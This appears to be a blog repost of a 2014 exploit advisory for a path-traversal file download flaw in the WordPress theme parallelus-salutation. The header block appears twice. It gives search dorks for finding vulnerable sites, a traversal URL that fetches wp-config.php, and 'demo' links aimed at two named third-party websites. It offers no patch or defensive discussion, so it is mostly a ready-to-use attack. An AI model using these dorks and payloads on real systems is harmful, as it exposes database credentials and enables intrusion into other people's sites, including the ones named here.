##############################################################
# Exploit Title: WordPress theme parallelus-salutation Arbitrary File Download Vulnerability .
#
# Exploit Author: Iran Cyber Security Group
#
# Discovered By: injector
#
# Dork 1: inurl:themes/parallelus-salutation/
#
# Dork 2: inurl:themes/parallelus-salutation/framework/
#
# Date: 18-12-2014
#
# Tested on: Kali, Win7
#
# Category: webapps
#
# platform: php
##############################################################
VULNERABILITY
##############
[~] VULNERABILITY}~~
[~] http://www.Site.com/wp-content/themes/parallelus-salutation/framework/utilities/download/getfile.php?file=..%2F..%2F..%2F..%2F..%2F..%2Fwp-config.php
##############
demo
http://www.patchingprotocol.com//wp-content/themes/parallelus-salutation/framework/utilities/download/getfile.php?file=..%2F..%2F..%2F..%2F..%2F..%2Fwp-config.php
http://openaircinema.org/wp-content/themes/parallelus-salutation/framework/utilities/download/getfile.php?file=..%2F..%2F..%2F..%2F..%2F..%2Fwp-config.php
# Exploit Title: WordPress theme parallelus-salutation Arbitrary File Download Vulnerability .
#
# Exploit Author: Iran Cyber Security Group
#
# Discovered By: injector
#
# Dork 1: inurl:themes/parallelus-salutation/
#
# Dork 2: inurl:themes/parallelus-salutation/framework/
#
# Date: 18-12-2014
#
# Tested on: Kali, Win7
#
# Category: webapps
#
# platform: php
##############################################################
VULNERABILITY
##############
[~] VULNERABILITY}~~
[~] http://www.Site.com/wp-content/themes/parallelus-salutation/framework/utilities/download/getfile.php?file=..%2F..%2F..%2F..%2F..%2F..%2Fwp-config.php
##############
demo
http://www.patchingprotocol.com//wp-content/themes/parallelus-salutation/framework/utilities/download/getfile.php?file=..%2F..%2F..%2F..%2F..%2F..%2Fwp-config.php
http://openaircinema.org/wp-content/themes/parallelus-salutation/framework/utilities/download/getfile.php?file=..%2F..%2F..%2F..%2F..%2F..%2Fwp-config.php
0 nhận xét:
Post a Comment